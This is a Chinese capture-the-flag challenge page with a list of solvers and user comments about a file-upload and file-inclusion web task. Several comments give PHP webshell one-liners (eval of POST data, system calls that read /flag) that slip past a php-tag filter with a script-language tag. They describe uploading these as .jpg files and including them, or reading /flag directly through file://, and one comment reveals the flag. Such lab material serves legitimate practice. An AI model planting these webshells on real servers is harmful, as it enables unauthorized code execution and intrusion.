评分(5)
解题动态
Mori. 攻破了该题 2天前
peaceminus1 攻破了该题 3天前
violet1 攻破了该题 3天前
Wu. 攻破了该题 3天前
Jazz888 攻破了该题 4天前
ugnfc 攻破了该题 7天前
hdcc1 攻破了该题 7天前
kiritoldws 攻破了该题 11天前
xyqsin 攻破了该题 13天前
19113115774 攻破了该题 13天前
无情的白给机器人 攻破了该题 15天前
yuanqinhe0123456789 攻破了该题 15天前
flag大王 攻破了该题 16天前
XF003C 攻破了该题 17天前
evilk 攻破了该题 17天前
等往事风中吹‘ 攻破了该题 17天前
爱意藏入虚空 攻破了该题 17天前
一定要做这些吗 攻破了该题 17天前
r1ng_13 攻破了该题 18天前
评论
leonleonleon 8月前
举报
1.'<'+'?'+'php' 和'>'会被过滤; 2.后缀名会被过滤; 3.用'<' script lanugage=php 后面自己闭合一下,最后文件包含上传获取flag
volnu1l 1年前
举报
新建txt,保存jpg <script language=php>system("ls /flag&&cat /flag")</script> 访问?file=upload/.jpg
yanqiye 1年前
举报
用file=/flag取巧做法,真正做题名字肯定要变,预期做法:传一句话,发现php标签被删了,直接用<?= @eval($_POST[1]);就可以了。
G3tcH4r 1年前
举报
花金币看了WP,不过自己试了下,发现script 设置language为php,也可以传能执行命令的马儿,这题蛮有意思
CHLing 1年前
举报
http://114.67.175.224:18550/index.php?file=//flag
qiusheng 1年前
举报
1、找到文件包含的路径XXXindex.php?file=upload.php;上传一句话木马(格式保存为jpg)<script language="php">@eval($_POST[cmd])</script> 2、上传完成后访问上传的路径看是否成功。XXX/index.php?file=upload/xxx.jpg 3、用蚁剑连接,url是XX
xiaoxiao972521 1年前
举报
虽然index.php?file=/flag 就出来了,但是依旧执着的绕过了upload.php
冯飞99 1年前
举报
绕来绕去看到你的评论一把过
zzccbb2005 2年前
举报
http://114.67.175.224:10017/index.php?file=file:///flag flag{27d76583b9a54c6ef8af91f66855ac12}
109张某 2年前
举报
这个题一句话传好像有些问题,我传了一堆,就只有下面仁兄的file:///flag方法成功了
asd+1024 1年前
举报
传木马的话,用<script language='php'>@eval($_POST['asd']);</script>然后,文件格式.jpg,在文件包含就可以了,file:///flag确实简单
不会编程的崽 2年前
举报
<?php>被过滤了,用这个<script language="php">@eval($_POST['attack'])</script>绕过,然后文件包含即可